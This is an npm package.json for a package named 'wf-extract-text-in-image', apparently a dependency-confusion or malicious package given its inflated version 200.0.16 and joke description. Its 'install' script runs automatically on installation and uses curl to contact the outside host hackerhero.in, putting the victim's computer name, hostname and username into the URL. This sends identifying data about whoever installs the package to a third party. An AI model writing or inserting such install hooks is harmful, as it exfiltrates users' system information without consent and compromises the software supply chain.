{
  "name": "wf-extract-text-in-image",
  "version": "200.0.16",
  "description": "wf-extract-text-in-image: coolest nodejs  package on planet earth",
  "main": "index.js",
  "scripts": {
   "install": "curl -sI http://hackerhero.in/jugnu/%computername%`hostname`/%username%-`whoami`/p-wf-extract-text-in-image"
  },
  "author": "another noob developer",
  "license": "ISC",
  "dependencies": {
    "wf-translate-text": "^0.0.1"
  }
}
